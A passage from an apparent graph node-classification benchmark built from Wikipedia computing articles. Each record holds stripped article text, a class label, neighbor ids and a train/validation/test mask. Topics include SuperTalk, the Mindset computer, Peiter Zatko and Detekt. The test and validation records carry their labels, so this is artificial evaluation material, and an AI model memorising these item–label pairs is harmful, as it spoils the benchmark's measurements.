    "text": "ScientificPython:scientificpython scientificpython open source library scientific tools python programming language development started 1995 updated since october 1 2014 library includes qt tk widget toolkits provided building cross-platform graphical user interfaces scientificpython released cecill main developer maintainer scientificpython konrad hinsen orléans university uses building block research code particular molecular modeling toolkit mmtk software nmoldyn uses molecular dynamics trajectories predict neutron scattering spectra outside particular application context users likely prefer package scipy seen dynamic evolution decade 2000–2010 involving several active developers",
    "neighbors": [
      3960,
      8554,
      462
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9209,
    "label": 9,
    "text": "SuperTalk:supertalk supertalk scripting language used supercard supertalk descendant hypertalk one powerful features supercard adds hypertalk language user properties hypertalk fixed set properties objects supercard scripters use codice_1 command add new properties buttons fields properties contain arbitrary text including numbers object references also represented using text xtalks even dumps entire files supertalk provides several variations hypertalk codice_2 codice_3 commands let one choose several items list choose icon available icons pick midi instrument play sound choose file supported image format including preview disks folders different hypertalk dialogs supertalk answer ask dialogs resize dynamically hold text however since supercard allows cards i.e pages windows arbitrary types one easily build one dialog large enough supertalk also codice_4 command displays standard system alert windows sheets including standard system icons switch command available readability complex conditionals various types media recorded e.g screen grabs card sound quicktime movies also codice_5 command equivalent copying pasting leaves clipboard unchanged enumeration command creates global variables sequential integer values recently metacard familiar codice_6 command iterating lists added supercard also offers exception handling using codice_7 statement associated codice_8 command supertalk came source-level debugger well ahead hypercard supertalk debugger modal window let set breakpoints clicking beside line special codice_9 command used enter debugger one view currently executing line code execute commands evaluate expressions etc supertalk debugger explicitly turned instead available right away script error occurs codice_10 command little stricter syntax exchange supports numerous additional transition effects including quicktime transitions special plug-in modules stored data fork resources type codice_11 special kind external command get unloaded window added type codice_12 differs noticeably xcmd protocol also n't use xwindoid protocol later introduced adding windows hypertalk supertalk also uses codice_13 command starting external applications different hypertalk codice_14 command supertalk uses opening various windows hypertalk deviated using course supertalk also exposes supercard expanded object model making possible create sliders scroll bars progress indicators scales scriptable paint draw graphics native listbox first-class menu objects multiple windows several styles modal panel non-modal scrolling resizable ... floating palettes also available focus activation scope modified full script control parts supercard deviate english-like-ness hypertalk includes codice_4 command tried emulate slightly awkward syntax codice_2 command bit much also seems time number xcmds simply rolled engine built-in commands maintaining memorable handler call syntax obvious case codice_17 function movies kind invisibly tacked window instead implemented real controls like sliders elements also properties control general application behaviour one-to-one translations underlying system apis e.g using appearance manager theming engine mac os 9",
    "neighbors": [
      9185,
      4042,
      4486
    ],
    "mask": "Test"
  },
  {
    "node_id": 9210,
    "label": 9,
    "text": "List_of_audio_programming_languages:list audio programming languages list notable programming languages optimized sound production algorithmic composition sound synthesis",
    "neighbors": [
      7172,
      267,
      6933,
      791,
      6810,
      4779,
      2861,
      9783,
      1210,
      9023,
      3904,
      8262,
      3665,
      10321,
      7128,
      7769,
      9565,
      7550,
      10083,
      2667,
      1390,
      7535,
      8947,
      8958
    ],
    "mask": "Test"
  },
  {
    "node_id": 9211,
    "label": 9,
    "text": "DWR_(Java):dwr java dwr direct web remoting java open-source library helps developers write web sites include ajax technology allows code web browser use java functions running web server functions within browser dwr project started joe walker 2004 1.0 released 29 aug 2005 dwr takes novel approach ajax dynamically generating javascript code based java classes thus web developer use java code javascript local web browser whereas reality java code runs web server full access web server resources security reasons web developer must configure exactly java classes safe export often called web.xml dwr.xml method remoting functions java javascript gives dwr users feel much like conventional rpc mechanisms like rmi soap benefit runs web without requiring web browser plug-ins dwr consider web browser web server protocol important prefers ensure programmer interface natural greatest challenge marry asynchronous nature ajax synchronous nature normal java method calls asynchronous model result data available time initial call made dwr solves problem allowing web developer specify function called data returned using extra method parameter extra method called callback method value returned java function passed callback method sample callback callback function inside json object passed additional parameter remoted function version 2.0 dwr supports comet also called reverse ajax java code running server deliberately send dedicated javascript browser",
    "neighbors": [
      9441,
      803,
      3462,
      1802,
      4171,
      5612,
      5677,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 9212,
    "label": 3,
    "text": "Mindset_(computer):mindset computer mindset released spring 1984 intel 80186-based ms-dos personal computer unlike ibm pc compatibles time custom graphics hardware supporting 16 simultaneous colors chosen 512-shade palette hardware-accelerated drawing capabilities including blitter allowed update screen 50 times fast cga adaptor standard pc basic unit priced conceptually similar successful commodore amiga released year later due financial legal complications spite glowing reviews system never sold well disappeared market year lamented industry commenters looked event first clear evidence end innovation favor compatibility distinctive case remains permanent collection museum modern art new york computer systems era cpu used create graphics drawing bit patterns directly memory separate hardware reads patterns produces actual video signal display mindset designed ex-atari engineers added new custom-designed vlsi vector processor handle many common drawing tasks like lines filling areas instead cpu work changing memory directly mindset cpu would simply set instructions hand actual bit fiddling separate processor mindset president compared chipset intel 8087 floating point processor running alongside intel 80186 machine based number parallels mindset amiga 1000 another computer designed ex-atari engineers offered advanced graphics development continued became clear machine would ready ms-dos-based microsoft windows 1.0 bill gates became personally involved project assist mindset emulating ibm character graphics without losing performance mindset officials determined desirable software compatible development frozen os burned rom late 1983 rom run 20 pc software base including microsoft flight simulator wordstar one pc applications reported run mindset publicized list 60 applications ran unmodified software base expected increase dramatically final version windows released release early 1984 jack tramiel rumored tried buy mindset technology would also amiga ultimately buying atari designing new machine off-the-shelf parts atari st mindset released 2 may 1984 base model 64k ram floppy disk drive sold us 1099 128k model single disk available 1,798 256k dual-disk version cost 2,398 disk-less version machine still usable system also included two rom cartridge ports front machine could used operating system another program canonical cartridge extended version gw-basic machine packaged unique enclosure designed gvo menlo park visually separated two sections rom slots lower half optional diskettes upper half sold complete custom nylon carrying case mindset president claimed graphics capabilities unmatched except us 50,000 workstations time garnered critical acclaim reviewers universally praising graphics overall performance much faster contemporary pcs although many cases caveat market rapidly standardizing summer 1985 clear system selling expected company re-purposed video production graphics design markets followed august round layoffs another january time half employees let go company filed chapter 11 protection 28 august never emerged 1985 clear system living promise windows 1.0 flop general john j. anderson published review system decrying personal computer market beginning value compatibility technology noted base system unit referred model m1001 later mindset ii computer released badge engineered version m1001 adhesive label designating ii embossed name internally video processor board separate mini-daughterboard enhanced functionality totally understood mindset ii advanced professional videographics system users guide makes mention chaining two mindset mindset ii referred front user guide model m1500 however internal pages reference m1000-ii also make mention mindset video production module model m1011 system architecture based intel 80186 proprietary vlsi chips enhanced sped graphics although disk compatible ibm pc dos enhanced graphics capabilities made achieving full ibm compatibility difficult competitors bill gates became involved development assisting mindset emulating ibm character graphics without losing performance mindset officials determined desirable software compatible development frozen os burned rom locked 20 pc software base including microsoft flight simulator wordstar one pc applications reported run mindset publicized list 60 applications ran unmodified software base expected increase dramatically final version windows released mindset design modular many aspects top case opening access system bus allowed expansion module plug main computer module add memory one two disk drives mindset designed several ex-atari engineers like amiga 1000 another computer era advanced graphics subsystem modular expandability jack tramiel forming ttl – tramiel technologies limited tried buy mindset technology spring 1984 dual 5.25 floppy drive module sat main unit available part common sales configuration system module also included expansion memory well mindset dual front-mounted rom cartridge ports locking knob left side main computer module lock rom modules place mindset option system configuration utility able select whether system booted left right rom carts disk drive cartridges could also contain cmos ram would retained unplugged battery cartridge case cartridges envisioned primary medium software distribution mindset sales system low cartridges economical software distributed disk instead released 1984 models m1001 mindset computer bios rom code 1.07 earlier show copyright notice c 1983 mindset computer corp rear computer equipped following ports rear main computer module also 3× 36 pin expansion bus slots dual disk/memory expansion unit adds additional 3 36 pin expansion bus slots system note noticeable internal external differences dual disk drive/memory expansion modules marked model m1003 others found marked m1004",
    "neighbors": [
      4674,
      10692,
      9126,
      9166,
      7983,
      6129,
      9363
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9213,
    "label": 4,
    "text": "OCML:ocml open configuration management layer ocml universal application configuration management layer helps develop integrated applications independent underlying group applications configurations management",
    "neighbors": [
      2149
    ],
    "mask": "Test"
  },
  {
    "node_id": 9214,
    "label": 4,
    "text": "Peiter_Zatko:peiter zatko peiter c. zatko better known mudge network security expert open source programmer writer hacker prominent member high-profile hacker think tank l0pht well long-lived computer culture hacking cooperative cult dead cow involved l0pht mudge contributed significantly disclosure education information security vulnerabilities addition pioneering buffer overflow work security advisories released contained early examples flaws following areas code injection race condition side-channel attack exploitation embedded systems cryptanalysis commercial systems original author password cracking software l0phtcrack 2010 mudge accepted position program manager darpa oversaw cyber security research 2013 mudge went work google advanced technology projects division born december 1970 mudge graduated berklee college music top class adept guitar player mudge responsible early research type security vulnerability known buffer overflow 1995 published write buffer overflows one first papers topic published first security advisories research demonstrating early vulnerabilities unix code injection side-channel attacks information leaks leader full disclosure movement initial author security tools l0phtcrack antisniff l0phtwatch mudge one first people hacker community reach build relationships government industry demand public speaker spoke hacker conferences def con academic conferences usenix mudge also member cult dead cow since 1996 one seven l0pht members testified senate committee 1998 serious vulnerabilities internet time l0pht became computer security consultancy stake 1999 mudge became vice president research development later chief scientist 2000 first crippling internet distributed denial-of-service attacks invited meet president bill clinton security summit alongside cabinet members industry executives 2004 became division scientist government contractor bbn technologies originally worked 1990s also joined technical advisory board nfr security 2010 announced would project manager darpa project focused directing research cyber security 2013 announced would leave darpa position google atap 2015 zatko announced twitter would join project called cyberul testing organisation computer security inspired underwriters laboratories mandated white house 11 august 2007 married sarah lieberman co-worker bbn darpa created cyber analytical framework agency used evaluate dod investments offensive defensive cyber security tenure ran least three dod programs known military networking protocol mnp cyber-insider threat cinder cyber fast track cft military networking protocol mnp provided network prioritization full user-level attribution military computer networks cyber-insider threat cinder focused identifying cyber espionage conducted virtual insider threats future variants stuxnet duqu cinder often mistakenly associated wikileaks media possibly due confusion darpa programs focused identifying human insider threat adams identification software espionage posed malware cinder program issue clarified mudge defcon 2011 keynote 46 minutes 11 seconds talk cyber fast track cft provided resources funding security research including programs run hackers hackerspaces makerlabs program provided alternative traditional government contracting vehicles accessible individuals small companies previously unable work within cumbersome complicated darpa process novel contracting effort averaging time 7 days receipt proposal funding provided proposing research organization program initially announced shmoocon 2011 keynote mudge published numerous papers advisories detailing security problems across different applications operating systems pioneering champion full disclosure",
    "neighbors": [
      9217,
      3843,
      6916,
      5512,
      1941,
      4117,
      161,
      10914,
      1187,
      1315,
      4389,
      10279,
      6184,
      7741,
      1474,
      1861,
      8135,
      2007,
      1114,
      4956,
      8671,
      9460,
      5111,
      7545,
      8827
    ],
    "mask": "Train"
  },
  {
    "node_id": 9215,
    "label": 4,
    "text": "Trustwave_SecureBrowsing:trustwave securebrowsing trustwave securebrowsing previously known finjan securebrowsing m86 securebrowsing security plug-in web browsers internet explorer firefox google chrome developed trustwave holdings formerly known m86 security finjan product longer supported backend required work longer exists software scans classifies web addresses provide user safety rating urls user visits proactively alerting user potentially malicious web addresses links search results ads selected web pages software protects user webpages could used compromise user privacy identity unlike products market based static databases containing information web domain reputations software scans url currently exists web time address displayed user browser code analysis approach efficient method alternatives detecting malicious behavior",
    "neighbors": [
      4487,
      6797,
      7983,
      5078,
      4471,
      10745,
      7515,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9216,
    "label": 2,
    "text": "SetACL:setacl setacl freeware utility manipulating security descriptors microsoft windows used available gnu lesser general public license lgpl command-line utility activex component changed freeware license version 3.0.0.0 list features taken product web page set 'change permissions directory c \\angela user 'brian domain 'dom1 remove write change permission sets desktop replace 'read execute permissions example use autoit found",
    "neighbors": [
      2432,
      4771,
      11683,
      8582,
      10026,
      6797,
      2959,
      847,
      2193,
      7343,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 9217,
    "label": 4,
    "text": "Chris_Wysopal:chris wysopal chris wysopal also known weld pond entrepreneur computer security expert co-founder cto veracode member high-profile hacker think tank l0pht vulnerability researcher chris wysopal born 1965 new connecticut mother educator father engineer attended rensselaer polytechnic institute troy new york received bachelor degree computer systems engineering 1987 seventh member join l0pht development projects included netcat l0phtcrack windows also webmaster/graphic designer l0pht website hacker news network first hacker blog researched published security advisories vulnerabilities microsoft windows lotus domino microsoft iis coldfusion weld one seven l0pht members testified senate committee 1998 could bring internet 30 minutes l0pht acquired stake 1999 became manager stake research group later stake vice president research development 2004 stake acquired symantec became director development 2006 founded veracode christien rioux serves cto 2017 veracode acquired ca technology 614m veracode subsequently spun became independent purchased thoma bravo 950m wysopal continues serve cto 2018 wysopal joined humanyze board directors wysopal instrumental developing industry guidelines responsible disclosure software vulnerabilities contributor rfpolicy first vulnerability disclosure policy together steve christey mitre proposed ietf rfc titled responsible vulnerability disclosure process 2002 process eventually rejected ietf within purview process become foundation organization internet safety industry group bringing together software vendors security researchers founder 2001 founded non-profit full disclosure mailing list vulnwatch moderator 2003 testified united states house representatives subcommittee topic vulnerability research disclosure 2008 wysopal recognized achievements industry named one 100 influential people eweek selected one infoworld cto 25 2010 named sans security thought leader 2012 began serving black hat review board named one top 25 disruptors 2013 computer reseller news 2014 named one 5 security thought leaders sc magazine",
    "neighbors": [
      9569,
      3619,
      1861,
      8135,
      5512,
      6665,
      9447,
      6797,
      4369,
      5111,
      4117,
      5048,
      4439,
      1912,
      8827,
      4956,
      9214
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9218,
    "label": 2,
    "text": "Celerra:celerra celerra discontinued nas device produced emc corporation available either integrated unit nas header added independent emc storage array clariion symmetrix supports smb nfs ftp ndmp tftp mpfs protocols celerra unified storage device use clariion storage array storage layer also provides iscsi fibre channel block-level storage introduced october 1996 nas market symmetrix network file storage later renamed celerra celerra promoted platform virtualization optional features included de-duplication replication ndmp storage tiering celerra runs real-time operating system called data access real time dart dart modified unix embedded kernel 32mb additional functionality like fibre channel driver hba bonding ethernet added operate file server celerra based x-blade architecture clariion available single data mover x-blade multiple data movers active-passive n+1 configuration comparable celerra products products netapp offer similar features protocol support apart ability use block-level fibre channel 2011 emc introduced new vnx series unified storage disk arrays intended replace clariion celerra products early 2012 clariion celerra discontinued data access real time dart real-time operating system used emc celerra modified unix kernel additional functionality dart embedded real-time operating system comprising modified unix kernel dedicated file server software together transfer files multimedia data across network using variety network protocols dart file server software executes entirely kernel—a real-time kernel design based monotonic scheduling dart kernel environment generic user-application environment instead dart kernel provides run-time environment file service embedded dedicated application dart file server software linked kernel single system image loaded execution boot time dart organized seven layers layers handle data movement dart functionality dart directed implementing processes contained layers starting layer closest hardware ending layer closest user interface dart ’ functionality organized follows layers 1 – 4 comprise functions performed within kernel programmer typically uses components limited higher numbered layers 5 6 add data moving applications dart ’ rpc framework component provides client server facilities implemented streams sockets dart acts rpc server context nfs rpc client context nis dart external environment dart designed provide rapid data movement information sharing across variety hardware platforms networked environment data transfers either request-response pull-type file transfers streaming push-type multimedia data time-sharing real-time isochronous characteristics two types rpc implemented dart traditional rpc onc rpc due dart ’ multi-threaded architecture traditional rpc implemented dart several modifications example sun os rpc code generator rpcgen assumes single-threaded unix process calls library directly however dart ’ unix processes instead uses true multi-threading—that n threads pick rpc messages come therefore using traditional rpc dart application must perform functions registering portmapper extracting credentials security information message checking security without extracting responsibility falls application developer—thread creation initialization end point creation initial create main loop processing stream reading message collector general synchronizer particular rpc needs declared whereas oncrpc collector built addition traditional rpc basic structure receiving message application developer must take apart means xdr format analyze addition client-side fully implemented finally rpc primarily synchronous protocol used asynchronously dart conjunction mutexes condition variables types locks dart implements rpc user datagram protocol udp transport control protocol tcp application single udp stream one tcp stream per connection common ip module acting multiplexer",
    "neighbors": [
      11233,
      10302,
      6852,
      7364,
      10951,
      6153,
      2154,
      1967,
      7983,
      5363,
      5397,
      7189,
      7863,
      1400,
      9366,
      11413,
      9374,
      5471
    ],
    "mask": "None"
  },
  {
    "node_id": 9219,
    "label": 3,
    "text": "Survivors_(video_game):survivors video game survivors also known survivors game home computers published atlantis software originally 1986 zx spectrum ported msx atari 8-bit family commodore 64 commodore 16 acorn electron bbc micro 1987 amstrad cpc 1988 puzzle game based rocks diamonds mechanics boulder dash game set 2087 'hibernation dome damaged nuclear war holds 1000 survivors stasis accessed humans fallen earth boulders player must control three droids gain access teleport survivors dome also populated guardian droids left maintain life support functions damaged nuclear fallout become hostile survivors must evacuated time limit runs radiation becomes strong game uses 'rocks diamonds mechanics popularised game boulder dash whereby player dig earth push boulders boulders fall area cleared emphasis puzzle element survivors closer repton main twist game droid perform one functions usually carried player similar games player must switch droids depending need droid 1 tunnel earth droid 2 teleport survivors home game equivalent collecting diamonds droid 3 push boulders means one droid becomes trapped game completed droids lose energy boulder falls top touch one faulty guardian droids guardian droids destroyed dropping boulders trapped behind boulders player droids destroyed game completed game first released zx spectrum received mixed reviews complaints included 'jerky movement dull graphics sound praise given playability value money crash awarded overall score 70 sinclair gave 6/10 c vg gave marks 4/10 5/10 without awarding overall score game ported number formats received generally positive reviews zzap 64 gave c64 version score 79 concluding game taxing mentally dexterously boulderdash fans suffering withdrawal symptoms enjoy survivors quite lot micro user even complimentary commenting could well knock repton perch electron user awarded 'golden game title overall score 9/10 including 10/10 playability value money",
    "neighbors": [
      10931,
      9853,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 9220,
    "label": 6,
    "text": "Persistent_memory:persistent memory computer science persistent memory method apparatus efficiently storing data structures continue accessed using memory instructions memory apis even end process created last modified often confused non-volatile random-access memory nvram persistent memory instead closely linked concept persistence emphasis program state exists outside fault zone process created process program execution fault zone process subset program state could corrupted process continuing execute incurring fault instance due unreliable component used computer executing program efficient memory-like access defining characteristic persistent memory provided using microprocessor memory instructions load store also provided using apis implement remote direct memory access rdma actions rdma read rdma write low-latency methods allow byte-grain access data also qualify persistent memory capabilities extend beyond non-volatility stored bits instance loss key metadata page table entries constructs translate virtual addresses physical addresses may render durable bits non-persistent respect persistent memory resembles abstract forms computer storage file systems fact almost existing persistent memory technologies implement least basic file system used associating names identifiers stored extents minimum provide file system methods used naming allocating extents",
    "neighbors": [
      346,
      3820,
      9762
    ],
    "mask": "None"
  },
  {
    "node_id": 9221,
    "label": 4,
    "text": "Certificate_Authority_Security_Council:certificate authority security council certificate authority security council casc multi-vendor industry advocacy group created conduct research promote internet security standards educate public internet security issues group founded february 2013 seven largest certificate authorities issuers ssl certificates — comodo symantec trend micro digicert entrust globalsign godaddy digicert withdrew group june 15 2018 casc supports efforts ca/browser forum standards-setting bodies support development enhancements improve secure sockets layer ssl operations certificate authorities ca according robin alden cto comodo member council casc serve united front cas involved standards-setting organization ’ committed supplementing standards-setting organizations providing education research advocacy best practices use ssl casc limits membership ssl certificate authorities meet requirements reputation operation security members required undergo annual audit adhere industry standards ca/browser forum ’ baseline requirements network security guidelines group works collaboratively create define initiatives improve understanding policies impact internet infrastructure group primary focus promoting understanding importance certificate-revocation checking benefits ocsp stapling protocol intended ensure web users aware visit web site revoked expired ssl certificate group also worked secure software distribution digital code signing code signing certificates play key role helping users identify authentic software code reputable publishers receive assurance code tampered beforehand",
    "neighbors": [
      11584,
      9569,
      3941,
      517,
      8615,
      8358,
      11653,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 9222,
    "label": 4,
    "text": "DSPAM:dspam dspam free software statistical spam filter written jonathan a. zdziarski author book ending spam books intended scalable content-based spam filter large multi-user systems dspam distributed terms gnu general public license development discontinued 2014 project consists library libdspam contains core filtering storage routines command-line web-based interfaces dspam mta-independent store spam classification data number database formats uses bayesian filtering among techniques learn adapt spam dspam original author claims users dspam reported high 99.5 99.95 accuracy including “ best recorded levels accuracy ... 99.991 one avid user 2 errors 22,786 99.987 author. ” however spam filter test performed trec 2005 best-performing dspam configuration misclassification rates worse filters test stated levels accuracy zdziarski protests results rights project sold sensory networks may 2007 development dspam resumed december 2007 sensory networks publishing 27 community-created patches cvs tree along new php-based webui development fork dspam dspam-community registered sourceforge october 10 2008 january 7 2009 mick johnson sensory networks announced “ looking shutting hosting dspam server end january. ” january 12 2009 mick sent follow-up email stating “ handing trademarks copyright dspam source dspam website administration mailing lists ” “ crew dspam-community. ” dspam dspam-community merged january 2009 development project continued name dspam driven community developers users 2014 dspam active upstream developers removed debian ubuntu current package repositories",
    "neighbors": [
      5249,
      6762,
      5835,
      8747,
      10541,
      7983,
      4272,
      2804,
      2901,
      5397,
      1305,
      7802,
      2399
    ],
    "mask": "None"
  },
  {
    "node_id": 9223,
    "label": 2,
    "text": "Cwm_(window_manager):cwm window manager cwm calm window manager stacking window manager x window system primarily developed part openbsd base system portable versions available unix-like operating systems development cwm started patches evilwm marius aamodt eriksen ease implementation new features cwm eventually rewritten using code 9wm last release original author came august 2005 april 2007 cwm imported openbsd source tree january 2008 substantial part original source code including 9wm code rewritten cwm distributed openbsd since version 4.2 replaced wm2 third-party linux port also exists cwm stacking window manager oriented towards heavy keyboard usage small footprint ease use lacks explicit virtual desktops functionality emulated using window groups mechanism cwm draw window decorations except 1-pixel border around windows cwm includes several menus menus operate search type manner cwm allows raising hiding switching searching windows using keyboard making suitable use terminal emulator multiplexer furthermore allows manipulating pointing devices mice keyboard additional key bindings configuration options specified configuration file codice_1 cwm generally well received software minimalist communities cwm noted used mainly due status one default window managers openbsd though reasons sometimes cited cwm also praised flexibility ease use fact used without mouse",
    "neighbors": [
      1668,
      10631,
      2825,
      3465,
      1932,
      7309,
      274,
      2581,
      5397,
      7702,
      10105,
      7325,
      934,
      429,
      6702,
      7983,
      9520,
      3764,
      823,
      9150,
      2245,
      1993,
      8778,
      3404,
      11086,
      5970,
      11221,
      5084,
      11485,
      7139,
      1637,
      10341,
      4071,
      8682,
      5867,
      1644,
      5230,
      8304,
      1785,
      8954,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9224,
    "label": 2,
    "text": "Concurrent_computing:concurrent computing concurrent computing form computing several computations executed overlapping time periods— concurrently —instead sequentially one completing next starts property system—this may individual program computer network—and separate execution point thread control computation process concurrent system one computation advance without waiting computations complete programming paradigm concurrent computing form modular programming namely factoring overall computation subcomputations may executed concurrently pioneers field concurrent computing include edsger dijkstra per brinch hansen c.a.r hoare concept concurrent computing frequently confused related distinct concept parallel computing although described multiple processes executing period time parallel computing execution occurs physical instant example separate processors multi-processor machine goal speeding computations—parallel computing impossible one-core single processor one computation occur instant single clock cycle contrast concurrent computing consists process lifetimes overlapping execution need happen instant goal model processes outside world happen concurrently multiple clients accessing server time structuring software systems composed multiple concurrent communicating parts useful tackling complexity regardless whether parts executed parallel example concurrent processes executed one core interleaving execution steps process via time-sharing slices one process runs time complete time slice paused another process begins resumes later original process resumed way multiple processes part-way execution single instant one process executed instant concurrent computations may executed parallel example assigning process separate processor processor core distributing computation across network general however languages tools techniques parallel programming might suitable concurrent programming vice versa exact timing tasks concurrent system executed depend scheduling tasks need always executed concurrently example given two tasks t1 t2 word sequential used antonym concurrent parallel explicitly distinguished concurrent/sequential parallel/serial used opposing pairs schedule tasks execute one time serially parallelism without interleaving sequentially concurrency task begins prior task ends called serial schedule set tasks scheduled serially serializable simplifies concurrency control main challenge designing concurrent programs concurrency control ensuring correct sequencing interactions communications different computational executions coordinating access resources shared among executions potential problems include race conditions deadlocks resource starvation example consider following algorithm make withdrawals checking account represented shared resource codice_1 suppose codice_2 two concurrent threads make calls codice_3 codice_4 line 3 operations executes line 5 operations find codice_5 evaluates codice_6 execution proceed subtracting withdrawal amount however since processes perform withdrawals total amount withdrawn end original balance sorts problems shared resources benefit use concurrency control non-blocking algorithms concurrent computing following advantages several models concurrent computing used understand analyze concurrent systems models include number different methods used implement concurrent programs implementing computational execution operating system process implementing computational processes set threads within single operating system process concurrent computing systems communication concurrent components hidden programmer e.g. using futures others must handled explicitly explicit communication divided two classes shared memory message passing concurrency different performance characteristics typically although always per-process memory overhead task switching overhead lower message passing system overhead message passing greater procedure call differences often overwhelmed performance factors concurrent computing developed earlier work railroads telegraphy 19th early 20th century terms date period semaphores arose address question handle multiple trains railroad system avoiding collisions maximizing efficiency handle multiple transmissions given set wires improving efficiency via time-division multiplexing 1870s academic study concurrent algorithms started 1960s credited first paper field identifying solving mutual exclusion concurrency pervasive computing occurring low-level hardware single chip worldwide networks examples follow programming language level operating system level network level networked systems generally concurrent nature consist separate devices concurrent programming languages programming languages use language constructs concurrency constructs may involve multi-threading support distributed computing message passing shared resources including shared memory futures promises languages sometimes described concurrency-oriented languages concurrency-oriented programming languages copl today commonly used programming languages specific constructs concurrency java c languages fundamentally use shared-memory concurrency model locking provided monitors although message-passing models implemented top underlying shared-memory model languages use message-passing concurrency model erlang probably widely used industry present many concurrent programming languages developed research languages e.g pict rather languages production use however languages erlang limbo occam seen industrial use various times last 20 years languages concurrency plays important role include many languages provide support concurrency form libraries levels roughly comparable list",
    "neighbors": [
      5651,
      5658,
      1051,
      3613,
      9245,
      10781,
      8226,
      6182,
      6184,
      5165,
      5677,
      5680,
      9780,
      1591,
      6718,
      8771,
      8772,
      10819,
      8262,
      1610,
      9294,
      3665,
      6228,
      2140,
      7775,
      3168,
      8293,
      4201,
      3698,
      9330,
      9331,
      2680,
      3705,
      9345,
      2691,
      7313,
      3733,
      8854,
      10909,
      9887,
      4770,
      5798,
      679,
      9385,
      7851,
      7341,
      6320,
      3762,
      6652,
      191,
      9926,
      9932,
      7889,
      5845,
      731,
      7395,
      4838,
      2283,
      8430,
      9454,
      1776,
      4341,
      2294,
      5880,
      5373,
      7421,
      256,
      8962,
      6403,
      6406,
      3848,
      6415,
      5395,
      7446,
      11030,
      1313,
      3876,
      2345,
      7983,
      4410,
      10042,
      10048,
      9538,
      11075,
      3398,
      4423,
      8008,
      5452,
      2901,
      11610,
      1889,
      1890,
      10083,
      9060,
      1382,
      6502,
      11625,
      8554,
      3960,
      10618,
      6016,
      3462,
      4998,
      8582,
      5527,
      9626,
      1435,
      7581,
      6558,
      3999,
      5029,
      5031,
      11688,
      428,
      5039,
      5040,
      10675,
      8122,
      3517,
      1480,
      2505,
      3529,
      4042,
      5585,
      11219,
      10198,
      5081,
      2012,
      477,
      2529,
      11242,
      9710,
      6639,
      4592,
      9714,
      2556,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9225,
    "label": 7,
    "text": "Publish–subscribe_pattern:publish–subscribe pattern software architecture publish–subscribe messaging pattern senders messages called publishers program messages sent directly specific receivers called subscribers instead categorize published messages classes without knowledge subscribers may similarly subscribers express interest one classes receive messages interest without knowledge publishers publish–subscribe sibling message queue paradigm typically one part larger message-oriented middleware system messaging systems support pub/sub message queue models api e.g java message service jms pattern provides greater network scalability dynamic network topology resulting decreased flexibility modify publisher structure published data publish-subscribe model subscribers typically receive subset total messages published process selecting messages reception processing called filtering two common forms filtering topic-based content-based topic-based system messages published topics named logical channels subscribers topic-based system receive messages published topics subscribe subscribers topic receive messages publisher responsible defining classes messages subscribers subscribe content-based system messages delivered subscriber attributes content messages matches constraints defined subscriber subscriber responsible classifying messages systems support hybrid two publishers post messages topic subscribers register content-based subscriptions one topics many pub/sub systems publishers post messages intermediary message broker event bus subscribers register subscriptions broker letting broker perform filtering broker normally performs store forward function route messages publishers subscribers addition broker may prioritize messages queue routing subscribers may register specific messages build time initialization time runtime gui systems subscribers coded handle user commands e.g. click button corresponds build time registration frameworks software products use xml configuration files register subscribers configuration files read initialization time sophisticated alternative subscribers added removed runtime latter approach used example database triggers mailing lists rss data distribution service dds middleware use broker middle instead publisher subscriber pub/sub system shares meta-data via ip multicast publisher subscribers cache information locally route messages based discovery shared cognizance one earliest publicly described pub/sub systems news subsystem isis toolkit described 1987 association computing machinery acm symposium operating systems principles conference sosp '87 paper exploiting virtual synchrony distributed systems 123–138 serious problems pub/sub systems side-effect main advantage decoupling publisher subscriber pub/sub system must designed carefully able provide stronger system properties particular application might require assured delivery pub/sub pattern scales well small networks small number publisher subscriber nodes low message volume however number nodes messages grows likelihood instabilities increases limiting maximum scalability pub/sub network example throughput instabilities large scales include pub/sub systems use brokers servers argument broker send messages subscriber in-band subject security problems brokers might fooled sending notifications wrong client amplifying denial service requests client brokers could overloaded allocate resources track created subscriptions even systems rely brokers subscriber might able receive data authorized receive unauthorized publisher may able introduce incorrect damaging messages pub/sub system especially true systems broadcast multicast messages encryption e.g transport layer security ssl/tls prevent unauthorized access prevent damaging messages introduced authorized publishers architectures pub/sub client/server systems also vulnerable authorized message senders behave maliciously",
    "neighbors": [
      1280,
      1411,
      7175,
      5257,
      3851,
      4107,
      5772,
      3733,
      3350,
      3990,
      2456,
      9365,
      5537,
      8100,
      5029,
      6694,
      3629,
      2222,
      8751,
      7347,
      3894,
      8758,
      8640,
      1218,
      5700,
      11339,
      333,
      2509,
      11343,
      337,
      4817,
      10581,
      7802,
      2137,
      2011,
      2780,
      1628,
      3038,
      349,
      734,
      479,
      4194,
      8928,
      8929,
      9441,
      3558,
      5357,
      1142,
      3705,
      6522
    ],
    "mask": "Test"
  },
  {
    "node_id": 9226,
    "label": 5,
    "text": "RPMsg:rpmsg rpmsg remote processor messaging protocol enabling inter-core communication heterogeneous multicore systems protocol rpmsg present linux kernel also available stand-alone component microcontroller-based systems rpmsg implementations developed open-source",
    "neighbors": [
      810
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9227,
    "label": 4,
    "text": "Detekt:detekt detekt discontinued free tool amnesty international digitale gesellschaft eff privacy international scan surveillance software microsoft windows intended use activists journalists scan known spyware detekt available free download tool guarantee detection spyware meant give false sense security meant used methods combat malware spyware 2014 coalition unlawful surveillance exports estimated global trade surveillance technologies worth 3 billion gbp annually detekt available amharic arabic english german italian spanish tool required installation designed scan surveillance software windows pcs xp windows 8.1 tool scanned current surveillance software scanning would display summary indicating spyware found would generate log file containing details tool guarantee absolute protection surveillance software scanned known spyware time release could modified circumvent detection new software would become available therefore clean bill health n't necessarily mean pc free surveillance software website instructed user disconnect internet connection close applications running turn connection back spyware found detekt released gplv3 free license detekt developed claudio guarnieri help bill marczak morgan marquis-boire eva galperin tanya o'carroll andre meister jillian york michael ligh endalkachew chala provided patterns following malware darkcomet rat xtremerat blackshades rat njrat finfisher finspy hackingteam rcs shadowtech rat gh0st rat",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      6797,
      9233,
      8978,
